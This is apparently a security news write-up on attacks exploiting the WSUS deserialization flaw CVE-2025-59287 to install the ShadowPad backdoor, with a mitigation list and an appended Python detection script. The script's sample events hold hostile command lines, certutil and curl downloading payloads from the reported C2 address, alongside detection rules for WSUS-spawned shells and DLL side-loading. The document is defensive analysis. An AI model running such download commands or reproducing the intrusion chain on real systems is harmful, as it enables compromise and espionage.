ShadowPad Slips Through WSUS: Inside a Server-Side Backdoor Operation
- Javier Conejo del Cerro
- 9 hours ago
- 2 min read

A recently patched flaw inside Microsoft WSUS, CVE-2025-59287, has become the centerpiece of a new wave of intrusions in which threat actors weaponize a deserialization vulnerability to obtain full system-level access. By targeting Internet-exposed WSUS servers, attackers leveraged the vulnerability to execute commands, open remote shells through PowerCat, and silently install ShadowPad, one of the most advanced modular backdoors historically tied to Chinese state-sponsored espionage. The attack demonstrates once again how a single unpatched component in the update supply chain can become a direct route to system compromise, persistence, and long-term clandestine operations.
Phase 1 — Initial Access: Exploiting the WSUS Flaw
The intrusion begins with the exploitation of CVE-2025-59287, a critical deserialization vulnerability in WSUS that grants remote code execution with system privileges. Public proof-of-concept exploit code made weaponization trivial, allowing threat actors to scan for exposed WSUS instances and instantly obtain privileged access. Once inside, the attackers launched PowerCat, an open-source PowerShell-based Netcat tool, creating an interactive system shell that provided full control over the Windows Server environment. With elevated privileges secured, the foundation for transitioning to a multi-stage infection chain was established.
Phase 2 — Delivery & Installation: ShadowPad Enters the System
Using built-in Windows utilities such as certutil.exe and curl.exe, the attackers downloaded the ShadowPad payload directly from their command-and-control server (149.28.78[.]189:42306). This technique allowed them to bypass traditional security controls by blending malicious traffic with legitimate administrative tools. Once downloaded, ShadowPad was deployed using DLL side-loading, abusing a trusted executable (ETDCtrlHelper.exe) to load a malicious DLL (ETDApix.dll). This gave them a memory-resident loader capable of executing the backdoor without leaving obvious traces on disk, ensuring persistence and stealth.
Phase 3 — Backdoor Activation & Silent Operation
Once active, ShadowPad initialized its core engine and began loading extended modules directly into memory. These plugins include capabilities for reconnaissance, command execution, persistence, and evasion. The malware’s architecture allows operators to expand functionality over time, making ShadowPad an adaptable platform for long-term espionage inside any breached network. Although ShadowPad is historically linked to Chinese state-sponsored groups, this specific operation has not been attributed to a known cluster—but the sophistication and tooling align with well-resourced actors.
This breach illustrates a fundamental risk within enterprise environments: update and management servers are high-value targets, and even a single vulnerability in WSUS can provide full system takeover. The weaponization of a public PoC, rapid exploitation, and deployment of ShadowPad highlight how swiftly threat actors move to operationalize newly patched flaws. Organizations must recognize that patching, hardening administrative interfaces, and restricting exposure of update infrastructure are essential steps to prevent system-level compromise. ShadowPad’s stealth, modularity, and use of legitimate Windows tools underscore the urgent need for proactive defense against supply-chain and server-side vulnerabilities.
Measures to Fend Off the Attack
- Patch WSUS immediately and verify installation of the CVE-2025-59287 fix.
- Remove WSUS from direct Internet exposure; place it behind VPN or zero-trust access.
- Block or restrict misuse of built-in dual-use tools (curl, certutil, PowerShell).
- Harden against DLL side-loading by enforcing code integrity and application control.
- Enable PowerShell Constrained Language Mode for non-admin contexts.
- Monitor for PoC-derived exploit traffic and suspicious access attempts to WSUS endpoints.
- Use EDR/XDR capable of detecting ShadowPad’s modular behavior, memory-resident loading, and anomalous plugin activity.
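As an added illustration of the monitoring measures above applied to the Phase 2 chain (shells spawned under WSUS, certutil/curl downloads, the reported C2 address, and the ETDCtrlHelper.exe/ETDApix.dll side-load), here is a small detection routine run over constructed process-creation and image-load events. It is not code from the article or from any vendor; the event format is invented, the set of WSUS host processes and the expected install location of the legitimate helper are assumptions, and only the IP:port and file names come from the write-up.

```python
import re
from typing import List, Tuple

# Indicators taken from the write-up; everything else here is a constructed illustration.
C2_IOC = "149.28.78.189:42306"
SIDELOAD_HOST = "etdctrlhelper.exe"
SIDELOAD_DLL = "etdapix.dll"
# Assumption: WSUS request handling runs inside these processes; a shell under them is abnormal.
WSUS_PROCS = {"w3wp.exe", "wsusservice.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed events, not real telemetry: "kind|image|parent|detail"
# kind=proc -> detail is the command line; kind=load -> detail is the loaded DLL path.
SAMPLE_EVENTS = [
    "proc|w3wp.exe|svchost.exe|w3wp.exe -ap WsusPool",
    "proc|cmd.exe|w3wp.exe|cmd.exe /c whoami",
    "proc|powershell.exe|cmd.exe|powershell.exe -NoProfile",
    "proc|certutil.exe|cmd.exe|certutil -urlcache -f http://149.28.78.189:42306/a C:\\Windows\\Temp\\ETDApix.dll",
    "proc|curl.exe|cmd.exe|curl http://149.28.78.189:42306/b -o C:\\Windows\\Temp\\ETDCtrlHelper.exe",
    "load|ETDCtrlHelper.exe|-|C:\\Windows\\Temp\\ETDApix.dll",
    "proc|notepad.exe|explorer.exe|notepad.exe notes.txt",
]

def classify(event: str) -> List[str]:
    """Return the names of every rule an event matches (empty list if none)."""
    kind, image, parent, detail = event.split("|", 3)
    image, parent, low = image.lower(), parent.lower(), detail.lower()
    hits = []
    if kind == "proc" and parent in WSUS_PROCS and image in SHELLS:
        hits.append("wsus_spawned_shell")  # post-exploitation shell under the WSUS worker
    if kind == "proc" and image in DOWNLOADERS and URL_RE.search(detail):
        hits.append("lolbin_download")     # certutil/curl fetching remote content
    if C2_IOC in low:
        hits.append("known_c2_ioc")        # address reported in the campaign
    if kind == "load" and image == SIDELOAD_HOST and low.endswith(SIDELOAD_DLL):
        # Assumption: the legitimate helper ships under Program Files; loading the DLL
        # from anywhere else is the side-loading pattern described in the article.
        if "\\program files" not in low:
            hits.append("dll_sideload")
    return hits

def scan(events: List[str]) -> List[Tuple[str, str]]:
    """Pair each matched rule with the event that triggered it."""
    return [(rule, ev) for ev in events for rule in classify(ev)]

if __name__ == "__main__":
    for rule, ev in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {ev}")
```

In a real deployment the same rules map onto Sysmon event ID 1 (process creation) and ID 7 (image load) fields, with the parent-process check extended to walk the full ancestry chain.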
The Hacker News